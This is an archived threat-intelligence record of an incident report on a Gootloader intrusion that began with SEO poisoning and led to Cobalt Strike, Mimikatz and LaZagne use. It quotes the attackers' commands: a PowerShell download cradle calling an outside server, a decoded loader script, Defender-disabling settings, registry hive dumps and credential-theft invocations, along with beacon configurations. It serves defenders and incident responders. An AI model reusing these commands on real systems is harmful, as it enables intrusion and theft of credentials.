{
	"id": "e4a4fb1f-7ff7-48cc-9266-975e833749b9",
	"created_at": "2026-04-06T00:09:17.442497Z",
	"updated_at": "2026-04-10T13:11:22.444972Z",
	"deleted_at": null,
	"sha1_hash": "fd826df6a1a0e5f8bffba5cd046d5401ad065143",
	"title": "SEO Poisoning - A Gootloader Story",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4657629,
	"plain_text": "SEO Poisoning - A Gootloader Story\r\nBy editor\r\nPublished: 2022-05-09 · Archived: 2026-04-05 13:18:48 UTC\r\nIn early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector.\r\nThe intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion,\r\ncredential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI,\r\nMimikatz, Lazagne, WMIExec, and SharpHound. The threat actors then used this access to review sensitive documents.\r\nBackground\r\nGootloader was the name assigned to the multi-staged payload distribution by Sophos in March 2021. The threat actors\r\nutilize SEO (search engine optimization) poisoning tactics to move compromised websites hosting malware to the top of\r\ncertain search requests such as “what is the difference between a grand agreement and a contract?” or “freddie mac shared\r\ndriveway agreement?”\r\nWhen the user searches for these phrases and clicks on one of the top results, they are left with a forum looking web page\r\nwhere the user is instructed to download a file, which they accidently execute (double click to open). You can learn more\r\nabout Gootloader by reading these references. 1 2 3 4\r\nThe researcher behind the @GootLoaderSites account is doing a great job of providing operational intelligence about the\r\nmost recent malicious infrastructure. They also contact impacted businesses, monitor for newly created C2 addresses, and\r\nmake the information public to the community. Thank you!\r\nCase Summary\r\nThe intrusion started with a user searching Bing for “Olymplus Plea Agreement?”. The user then clicked on the second\r\nsearch result which led to the download and execution of a malicious javascript file (see video in Initial Access section).\r\nUpon execution, Gootloader utilized encoded PowerShell scripts to load Cobalt Strike into memory and persist on the host\r\nusing a combination of registry keys and scheduled tasks.\r\nFifteen minutes after the initial execution, we observed the threat actors using the PowerShell implementation of\r\nSharpHound (BloodHound) to discover attack paths in the Active Directory-based network. The threat actors collected the\r\nresults and pivoted to another host via a Cobalt Strike PowerShell beacon.\r\nAfter pivoting, they disabled Windows Defender, before executing a second Cobalt Strike payload for a different command\r\nand control server. Around an hour after the initial infection, the threat actors ran LaZagne to retrieve all saved credentials\r\nfrom the pivoted workstation. Meanwhile on the beachhead host, the threat actors ran Mimikatz via PowerShell to extract\r\ncredentials.\r\nWith those credentials, the threat actors used RDP from the beachhead host to the already compromised workstation host.\r\nThey then targeted several other workstations with Cobalt Strike beacon executables; however, no further activity was\r\nobserved on those endpoints other than the initial lateral movement.\r\nThe threat actors favored RDP and remote WMI as their preferred methods to interact with the hosts and servers of interest\r\nthroughout the rest of the intrusion. After around a four-hour pause of inactivity, the threat actors enabled restricted admin\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 1 of 20\n\nmode via WMI on a domain controller and logged in using RDP.\r\nThe threat actors then used Lazagne again on the domain controller to extract more credentials. Our evidence shows that the\r\nattackers then began looking for interesting documents on file shares. They opened the documents one-by-one on the remote\r\nhost via RDP. They directed their focus to documents with legal and insurance-related content.\r\nOn the second and final day of the intrusion, the threat actors ran Advanced IP Scanner from the domain controller via the\r\nRDP session. Additionally, they inspected the file server and backup server, looking for more interesting data before leaving\r\nthe network.\r\nServices\r\nWe offer multiple services, including a Threat Feed service that tracks Command and Control frameworks such as Cobalt\r\nStrike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be\r\nfound here.\r\nWe also have artifacts and IOCs available from this case, such as pcaps, memory captures, files, event logs including\r\nSysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 2 of 20\n\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 3 of 20\n\nAnalysis and reporting completed by @kostastsale @iiamaleks @pigerlin\r\nInitial Access\r\nThe threat actor gained initial access using Gootloader malware. Here’s a video of the user searching and downloading the\r\nmalware via the poisoned SEO search.\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nThe Javascript file is then executed when double clicked after the zip is opened.\r\nExecution\r\nGootloader upon execution creates two registry keys:\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username0\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 4 of 20\n\nThe first is populated with an encoded Cobalt Strike payload and the latter is used to store a .NET loader named\r\npowershell.dll.\r\nFollowing the Registry events, a PowerShell command was launched executing an encoded command.\r\n\"powershell.exe\" /c C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe \"/\"e\" NgAxA\"DQANgA0ADkA\"MgAxADEA\r\nThe PowerShell command will extract the .NET loader from HKCU:\\SOFTWARE\\Microsoft\\Phone\\Username0 and execute the\r\ncode in memory via `Assembly.Load()`.\r\n614649211; sleep -s 83; $opj=Get-ItemProperty -path (\"hkcu:\\software\\microsoft\\Phone\\\"+[Environment]::(\"userna\r\nThis CyberChef recipe can be used to decode the related PS encoded payload.\r\nOnce the PowerShell script is finished running, the next stage involves the .NET loader. The .NET loader will read\r\nHKCU:\\SOFTWARE\\Microsoft\\Phone\\Username and extract the encoded Cobalt Strike payload. This payload will be decoded\r\nand subsequently loaded into memory for execution.\r\nA simple encoding scheme is used where a letter will correspond to one of the hex characters (0-F), or alternately three\r\nzeros.\r\nq-\u003e000\r\nv-\u003e0\r\nw-\u003e1\r\nr-\u003e2\r\nt-\u003e3\r\ny-\u003e4\r\nu-\u003e5\r\ni-\u003e6\r\no-\u003e7\r\np-\u003e8\r\ns-\u003e9\r\nq-\u003eA\r\nh-\u003eB\r\nj-\u003eC\r\nk-\u003eD\r\nl-\u003eE\r\nz-\u003eF\r\nThe following shows the source code responsible for the core logic of the .NET loader.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 5 of 20\n\nAn excellent resource from Microsoft describes a set of configurations that can be applied to Windows that can stop .js\r\nfiles from executing, preventing this attack chain from ever getting off the ground.\r\nDuring later stages of the intrusion, Cobalt Strike was executed interactively through RDP on multiple systems.\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/tri\r\nPersistence\r\nThe Javascript (Gootloader) file invoked an encoded PowerShell command.\r\nThe encoded PowerShell command creates a Scheduled Task that executes when the selected user logs on to the computer.\r\nAn encoded PowerShell command is executed that will retrieve and execute the payload stored in the Registry.\r\n6876813;\r\n$a=\"NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQ\r\n$u=$env:USERNAME;\r\nRegister-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCu\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 6 of 20\n\n30687851\r\nDecoded PowerShell Payload:\r\n6876813;\r\n614649211;\r\n$a = \"614649211\";\r\nsleep - s 83;\r\n$opj = Get - ItemProperty - path(\"hkcu:\\software\\microsoft\\Phone\\\"\"+[Environment]::(\" username \")+\" 0 \");\r\n for ($uo = 0; $uo - le 760; $uo ++) {\r\n Try {\r\n $mpd += $opj.$uo\r\n }\r\n Catch {}\r\n};\r\n$uo = 0;\r\nwhile ($true) {\r\n $uo ++;\r\n $ko = [math]::(\"sqrt\")($uo);\r\n if ($ko - eq 1000) {\r\n break\r\n }\r\n}\r\n$yl = $mpd.replace(\"#\", $ko);\r\n$kjb = [byte[]]::(\"new\")($yl.Length / 2);\r\nfor ($uo = 0; $uo - lt $yl.Length; $uo += 2) {\r\n $kjb[$uo / 2] = [convert]::(\"ToByte\")($yl.Substring($uo, 2), (2 * 8))\r\n}[reflection.assembly]::(\"Load\")($kjb);\r\n[Open]::(\"Test\")();\r\n611898544;\r\n$u = $env : USERNAME;\r\nRegister - ScheduledTask $u - In(New - ScheduledTask - Ac(New - ScheduledTaskAction - E([Diagnostics.Process]\r\n306878516;\r\nThe task created from the PowerShell script:\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 7 of 20\n\nDefense Evasion\r\nThis was observed on multiple servers the threat actor pivoted to.\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Cache Maintenance\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Cleanup\" /f\r\nschtasks /delete /tn \"\\Microsoft\\Windows\\Windows Defender\\Windows Defender Verification\" /f\r\nFurthermore, PowerShell was used to disable multiple security features built into Microsoft Defender.\r\nSet-MpPreference -DisableRealtimeMonitoring $true\r\nSet-MpPreference -DisableArchiveScanning $true\r\nSet-MpPreference -DisableBehaviorMonitoring $true\r\nSet-MpPreference -DisableIOAVProtection $true\r\nSet-MpPreference -DisableIntrusionPreventionSystem $true\r\nSet-MpPreference -DisableScanningNetworkFiles $true\r\nSet-MpPreference -MAPSReporting 0\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 8 of 20\n\nSet-MpPreference -DisableCatchupFullScan $True\r\nSet-MpPreference -DisableCatchupQuickScan $True\r\nAs in many cases involving Cobalt Strike, we observed rundll32 used to load the Cobalt Strike beacons into memory on the\r\nbeachhead host.\r\nThis can be observed in the memory dump from the beachhead host with the tell-tale PAGE_EXECUTE_READWRITE protection\r\nsettings on the memory space and MZ headers observable in the process memory space.\r\nDuring the intrusion we observed various named pipes utilized by the threat actor’s Cobalt Strike beacons including default\r\nCobalt Strike named pipes.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 9 of 20\n\nPipeName: \\msagent_ld\r\nPipeName: \\1ea887\r\nThe threat actors were observed making use of double encoded Powershell commands. The first layer of encoding contains\r\nHexadecimal and XOR encoding.\r\nDecoding this script reveals that it is a publicly available WMIExec script for running remote WMI queries.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 10 of 20\n\nCredential Access\r\nThe malicious PowerShell process used by Gootloader dropped a PowerShell script named “mi.ps1” on the file system.\r\npowershell -nop -noni -ep bypass -w h -c \"\"$t=([type]'Convert');\u0026([scriptblock]::Create(($t::(($t.GetMethods()\r\nThis CyberChef recipe can be used to decode the inner encoded command.\r\nThe output lists “Invoke-Mimikatz”, a direct reference to the PowerShell Invoke-Mimikatz.ps1 script used to load Mimikatz\r\nDLL directly in memory.\r\n$u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|\u0026(GCM I*e-E*); Import-Module C:\\Users\\\u003credacted\u003e\\mi.ps1; Invoke-Monitoring PowerShell event id 4103 we can observe the threat actor’s successful credential access activity from the\r\nMimikatz invocation.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 11 of 20\n\nIn addition, the post-exploitation tool “LaZagne” (renamed to ls.exe) was used with the “-all” switch.\r\nls.exe all -oN -output C:\\Users\\REDACTED\r\nThis will dump passwords (browsers, LSA secret, hashdump, Keepass, WinSCP, RDPManager, OpenVPN, Git, etc.) and\r\nstore the output file (in our case) in the “C:\\Users” directory. When LaZagne is run with admin privileges, it also attempts to\r\ndump credentials from local registry hives, as can be seen below.\r\nHere’s the commands from another system:\r\ncmd.exe /c \"reg.exe save hklm\\sam c:\\users\\REDACTED\\appdata\\local\\temp\\1\\dznuxujzr\"\r\ncmd.exe /c \"reg.exe save hklm\\system c:\\users\\REDACTED\\appdata\\local\\temp\\1\\mkffdg\"\r\ncmd.exe /c \"reg.exe save hklm\\security c:\\users\\REDACTED\\appdata\\local\\temp\\1\\iszmqwmjemt\"\r\nDiscovery\r\nThe threat actors used the PowerShell implementation of SharpHound (Bloodhound) on the beachhead host to enumerate the\r\nActive Directory domain. The Cobalt Strike beacon was used to invoke the PowerShell script.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAb\r\nThey also ran a WMI command on the beachhead host and one other host to check for AntiVirus.\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List\r\nThe threat actors executed this command remotely on a domain controller, before moving laterally to it:\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 12 of 20\n\npowershell.exe ls C:\\ \u003e C:\\file.txt\r\nWhile having an interactive RDP session, in an attempt to collect more information regarding the host, the attackers used\r\nPowerShell to run systeminfo on one of the hosts they pivoted to.\r\nOn the last day, and before they left the network, threat actors used Advanced IP Scanner to scan the whole network for the\r\nbelow open ports:\r\n21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502\r\nLateral Movement\r\nAs observed in many of our intrusions, the threat actor created and installed Windows services to deploy Cobalt Strike\r\nbeacons. This method was used to pivot to other systems within the network.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 13 of 20\n\nSMB was also used to transfer executable Cobalt Strike beacons to various workstations in the environment.\r\nThese executables were then executed by a remote service visible in the windows event id 7045 logs.\r\nNext to deploying Cobalt Strike beacons, the threat actor also used RDP to establish interactive sessions with various hosts\r\non the network. One important aspect of these sessions is that the threat actor authenticated using “Restricted Admin Mode”.\r\nRestricted Admin Mode can be considered a double-edged sword; although it prevents credential theft, it also enables an\r\nattacker to perform a pass-the-hash attack using RDP. In other words, after enabling Restricted Admin Mode, just the NTLM\r\nhash of the remote desktop user is required to establish a valid RDP session, without the need of possessing the clear\r\npassword.\r\nThe threat actor attempted to use both Invoke-WMIExec and psexec to enable “”.\r\npsexec \\\\\u003credacted\u003e -u \u003credacted\u003e\\\u003credacted\u003e -p \u003credacted\u003e reg add \"hklm\\system\\currentcontrolset\\control\\lsa\"\r\npowershell -nop -noni -ep bypass -w h -c \"$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});\u0026(''.SubString.ToString(\r\nThe logon information of EventID 4624 includes a field “Restricted Admin Mode”, which is set to the value “Yes” if the\r\nfeature is used.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 14 of 20\n\nCollection\r\nThe threat actor accessed multiple files during the RDP sessions on multiple servers. In one instance document files were\r\nopened directly on the system.\r\nShellbags reveled attempts to enumerate multiple file shares containing information of interest to the threat actor.\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 15 of 20\n\nCommand and Control\r\nGootloader\r\nGootloader second stage download URLs. These URLs were deobfuscated and extracted using this script by HP Threat\r\nResearch. They’ve updated this script at least a few times now, thanks @hpsecurity and thanks to @GootLoaderSites for\r\nsharing on twitter as its broken/fixed.\r\nhxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl=\r\nhxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl=\r\nhxxps://junk-bros[.]com/test.php?hjkiofilihyl=\r\nDuring the intrusion the Gootloader loader was observed communicating to 35.206.117.64:443 kakiosk[.]adsparkdev[.]com.\r\nJa3:a0e9f5d64349fb13191bc781f81f42e1\r\nJa3s:567bb420d39046dbfd1f68b558d86382\r\nCertificate: [d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61 ]\r\nNot Before: 2022/01/05 09:25:33 UTC\r\nNot After: 2022/04/05 09:25:32 UTC\r\nIssuer Org: Let's Encrypt\r\nSubject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com ,www.kakiosk.adsparkdev.com ]\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike\r\n146.70.78.43\r\nCobalt Strike server TLS configuration:\r\n146.70.78.43\r\nJa3:72a589da586844d7f0818ce684948eea\r\nJa3s:f176ba63b4d68e576b5ba345bec2c7b7\r\nSerial Number: 146473198 (0x8bb00ee)\r\nCertificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F\r\nNot Before: May 20 18:26:24 2015 GMT\r\nNot After: May 17 18:26:24 2025 GMT\r\nIssuer: C=, ST=, L=, O=, OU=, CN=\r\nSubject: C=, ST=, L=, O=, OU=, CN=\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike beacon configuration:\r\nCobalt Strike Beacon:\r\n x86:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 146.70.78.43,/visit.js\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 16 of 20\n\nhttp-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n x64:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 146.70.78.43,/fwlink\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n37.120.198.225\r\nCobalt Strike server TLS configuration:\r\nJa3:72a589da586844d7f0818ce684948eea\r\nJa3s:f176ba63b4d68e576b5ba345bec2c7b7\r\nSerial Number: 146473198 (0x8bb00ee)\r\nCertificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4F\r\nNot Before: May 20 18:26:24 2015 GMT\r\nNot After : May 17 18:26:24 2025 GMT\r\nIssuer: C=, ST=, L=, O=, OU=, CN=\r\nSubject: C=, ST=, L=, O=, OU=, CN=\r\nPublic Algorithm: rsaEncryption\r\nCobalt Strike beacon configuration:\r\nCobalt Strike Beacon:\r\n x86:\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 17 of 20\n\nbeacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 37.120.198.225,/cm\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)\r\n uses_cookies: 1\r\n watermark: 1580103824\r\n x64:\r\n beacon_type: HTTPS\r\n dns-beacon.strategy_fail_seconds: -1\r\n dns-beacon.strategy_fail_x: -1\r\n dns-beacon.strategy_rotate_seconds: -1\r\n http-get.client:\r\n Cookie\r\n http-get.uri: 37.120.198.225,/ptj\r\n http-get.verb: GET\r\n http-post.client:\r\n Content-Type: application/octet-stream\r\n id\r\n http-post.uri: /submit.php\r\n http-post.verb: POST\r\n maxgetsize: 1048576\r\n port: 443\r\n post-ex.spawnto_x64: %windir%\\sysnative\\rundll32.exe\r\n post-ex.spawnto_x86: %windir%\\syswow64\\rundll32.exe\r\n process-inject.execute:\r\n CreateThread\r\n SetThreadContext\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\n process-inject.startrwx: 64\r\n process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648\r\n process-inject.userwx: 64\r\n proxy.behavior: 2 (Use IE settings)\r\n server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64\r\n sleeptime: 60000\r\n useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_v\r\n uses_cookies: 1\r\n watermark: 1580103824\r\nNetscan data extracted via Volatility from the beachhead host showing Cobalt Strike C2 connections:\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 18 of 20\n\nVolatility 3 Framework 2.0.0\r\nOffset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Create\r\n...\r\n0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe\r\n0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe\r\n...\r\nImpact\r\nIn this case, there was no further impact to the environment before the threat actors were evicted.\r\nIndicators\r\nNetwork\r\nGootloader\r\nhttps://kakiosk.adsparkdev[.]com\r\nhttps://jp.imonitorsoft[.]com\r\nhttps://junk-bros[.]com\r\n35.206.117.64:443\r\nCobalt Strike\r\n146.70.78.43:443\r\n37.120.198.225:443\r\nFile\r\nolympus_plea_agreement 34603 .js\r\nd7d3e1c76d5e2fa9f7253c8ababd6349\r\n724013ea6906a3122698fd125f55546eac0c1fe0\r\n6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b\r\nolympus plea agreement(46196).zip\r\nb50333ff4e5cbcda8b88ce109e882eeb\r\n44589fc2a4d1379bee93282bbdb16acbaf762a45\r\n7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c\r\nmi.ps1\r\nacef25c1f6a7da349e62b365c05ae60c\r\nc5d134a96ca4d33e96fb0ab68cf3139a95cf8071\r\nd00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b\r\nInvoke-WMIExec.ps1\r\nb4626a335789e457ea48e56dfbf39710\r\n62a7656d81789591358796100390799e83428519\r\nc4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222\r\nls.exe\r\n87ae2a50ba94f45da39ec7673d71547c\r\ndfa0b4206abede8f441fcdc8155803b8967e035c\r\n8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4\r\nDetections\r\nNetwork\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nSigma\r\nCustom Sigma rules\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 19 of 20\n\nDeleting Windows Defender scheduled tasks\r\nEnabling restricted admin mode\r\nSigma repo rules\r\nYara\r\nCustom Yara rule\r\nMITRE\r\nT1189 Drive-by Compromise\r\nT1204.001 – User Execution: Malicious Link\r\nT1204.002 – User Execution: Malicious File\r\nT1059.001 – Command and Scripting Interpreter: PowerShell\r\nT1053 – Scheduled Task/Job\r\nT1218.011 – System Binary Proxy Execution: Rundll32\r\nT1003.001- OS Credential Dumping: LSASS Memory\r\nT1087 – Account Discovery\r\nT1560 – Archive Collected Data\r\nT1482 – Domain Trust Discovery\r\nT1615 – Group Policy Discovery\r\nT1069 – Permission Groups Discovery\r\nT1018 – Remote System Discovery\r\nT1033 – System Owner/User Discovery\r\nT1021.001 – Remote Services: Remote Desktop Protocol\r\nT1021.006 – Remote Services: Windows Remote Management\r\nT1005 – Data from Local System\r\nT1039 – Data from Network Shared Drive\r\nT1046 – Network Service Scanning\r\nT1562.001 – Impair Defenses: Disable or Modify Tools\r\nT1518.001 – Security Software Discovery\r\nT1071.001 Web Protocols\r\nT1027 – Obfuscated Files or Information\r\nSource: https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/"
	],
	"report_names": [
		"seo-poisoning-a-gootloader-story"
	],
	"threat_actors": [],
	"ts_created_at": 1775434157,
	"ts_updated_at": 1775826682,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.pdf",
		"text": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.txt",
		"img": "https://archive.orkl.eu/fd826df6a1a0e5f8bffba5cd046d5401ad065143.jpg"
	}
}